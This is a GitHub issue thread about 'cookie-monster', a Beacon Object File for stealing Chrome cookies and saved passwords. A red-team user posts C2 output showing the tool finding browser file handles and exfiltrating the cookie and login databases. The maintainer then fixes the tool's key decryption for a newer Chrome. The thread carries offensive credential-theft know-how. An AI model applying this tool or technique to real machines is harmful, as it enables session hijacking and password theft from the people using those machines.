search

KingOfTheNOPs / cookie-monster

BOF to steal browser cookies & credentials
GNU General Public License v3.0
209 stars 25 forks source link

Failed Decrypting the key.... #8

Closed clspejd closed 1 month ago

clspejd commented 1 month ago

I compiled it without any issues and on execution it downloads ChromeCookie.db file too. But it fails decrypting the key and doesn't gave me cookies

Below I am attaching complete log, for you....

[+] Send Task to Agent [31 bytes] [+] Received Output [15 bytes]: CHROME SELECTED [+] Received Output [84 bytes]: LOOKING FOR FILE: C:\Users\\AppData\Local\Google\Chrome\User Data\Local State

[!] Received Output [27 bytes]: Decrypting the key failed.

[+] Received Output [23 bytes]: Browser PID found 5872

[+] Received Output [41 bytes]: Searching for handle to Network\Cookies

[!] Received Output [40 bytes]: NO HANDLE TO Network\Cookies WAS FOUND

[+] Received Output [23 bytes]: Browser PID found 5872

[+] Received Output [36 bytes]: Searching for handle to Login Data

[+] Received Output [21 bytes]: Login Data WAS FOUND

[+] Received Output [106 bytes]: Handle Name: \Device\HarddiskVolume2\Users\\AppData\Local\Google\Chrome\User Data\Default\Login Data

[+] Received Output [19 bytes]: file size is 40960

[*] Started download of file: ChromePasswords.db [40960] [+] Finished download of file: ChromePasswords.db [+] Received Output [32 bytes]: The file was downloaded filessly [+] Received Output [23 bytes]: Browser PID found 6236

[+] Received Output [41 bytes]: Searching for handle to Network\Cookies

[!] Received Output [40 bytes]: NO HANDLE TO Network\Cookies WAS FOUND

[+] Received Output [23 bytes]: Browser PID found 7088

[+] Received Output [41 bytes]: Searching for handle to Network\Cookies

[!] Received Output [40 bytes]: NO HANDLE TO Network\Cookies WAS FOUND

[+] Received Output [23 bytes]: Browser PID found 2688

[+] Received Output [41 bytes]: Searching for handle to Network\Cookies

[+] Received Output [26 bytes]: Network\Cookies WAS FOUND

[+] Received Output [111 bytes]: Handle Name: \Device\HarddiskVolume2\Users\\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies

[+] Received Output [20 bytes]: file size is 262144

[] Started download of file: ChromeCookie.db [262144] [+] Finished download of file: ChromeCookie.db [+] Received Output [32 bytes]: The file was downloaded filessly [] BOF execution completed

KingOfTheNOPs commented 1 month ago

thanks for submitting an issue! looks like both the passwords and cookies file were downloaded but the key failed to decrypt. Could you provide more information? I'll try and recreate the problem and fix it. What was the windows version and chrome version? @clspejd

clspejd commented 1 month ago

Looks good when people are dedicated to resolve issues quickly without any excuses :)

OS Name - Microsoft Windows 10 Pro OS Version - 10.0.19045 N/A Build 19045 OS Manufacturer - Microsoft Corporation OS Configuration - Standalone Workstation

I have my RED Team engagement starting from 21 July,2024. I thought to use this tool in it. That's why I am checking it before whether I can rely on it or not ?

If you need anything else or more info then don't hesitate to ask :)

clspejd commented 1 month ago

I turned OFF Security Solution that was present. Also, I tried executing as a normal user and also with Admin privileges. But in both cases the issue persists :(

KingOfTheNOPs commented 1 month ago

@clspejd No issues on my end today with CS as the C2. Will try Havoc later on and keep ya posted.

KingOfTheNOPs commented 1 month ago

@clspejd try again with new update. Chrome added a second encrypted_key in the Local State file. fixed the pattern searching for it

clspejd commented 1 month ago

Thanks, it's now working!! :)